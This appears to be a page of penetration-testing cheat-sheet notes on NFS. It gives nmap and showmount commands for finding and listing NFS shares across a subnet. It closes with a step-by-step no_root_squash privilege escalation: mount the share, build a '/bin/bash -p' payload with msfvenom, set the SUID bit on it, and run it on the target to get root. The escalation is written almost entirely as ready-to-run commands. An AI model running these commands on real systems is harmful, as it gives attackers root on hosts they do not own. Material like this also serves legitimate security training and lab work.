NFS

Network File System - Port 2049

  • Allows a user on a client computer to access files over a network as if it were local

nmap -sV -script=nfs-showmount <tgt>
showmount -e <tgt>

NFS - Find and Enum

nmap -v -p 111 10.x.x.0/24 -oG nfs.nmap
cat nfs.nmap | grep 111 | grep -v "Nmap" | awk '{print $2}' > nfs.ip 
nmap -sV -p111 --script=rpcinfo -iL nfs.ip
ls -l /usr/share/nmap/scripts/nfs*
nmap -p111 --script nfs* -iL nfs.ip nfs.enum

NFS - Sweep

  • Wildcard NSE didnt work well

  • Better to run NSE individually or as a Loop

> nmap -sV -p111,2049 10.x.x.0/24 -oG nfs.nmap 
> grep open nfs.nmap | cut -d' ' -f2 > nfs.ip 

> nmap -sV -p111,2049 --script=rpcinfo -iL nfs.ip -oN rpc_scripts.nmap
> nmap -sV -p111 --script=nfs* -iL nfs.ip -oN nfs_scripts2.nmap

> for vuln in $(ls -1 /usr/share/nmap/scripts/nfs* | cut -d "/" -f6); 
do nmap -p 111 --script $vuln 10.11.1.72; done

NFS Root Squashing

  • Network File System

  • Send a rootbash over NFS with local root impersonating remote root

  • Only works if "no_root_squash" is setup

  • Remote users can: mount/access/create/modify files

  • Default: Created files inherit remote user/group ID

  • Even if not on the NFS server

  • How NFS protects obvious privesc

  • If remote user claims to be root uid=0

  • NFS will squash and treat as a nobody

  • Feature can be disabled!

  • REF: TarBackups

-------------------------
showmount -e <tgt>
nmap -sV -script=nfs-showmount <tgt>
mount -o rw,vers=2 <tgt>:<share> <localdir>

-------------------------
lse.sh -l 2 -i   ..found nfs share
cat /etc/exports
/tmp *(rw,sync,no_root_squash)

-------------------------
Local:
showmount -e 192.x.y.z
mkdir /tmp/nfs
mount -o rw,vers=2 192.x.y.z:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf

-------------------------
Target:
ls -l /tmp       ..owned by root, with suid
/tmp/shell.elf   ..executed as root
root!!
PreviousMySqlNextOracle

Last updated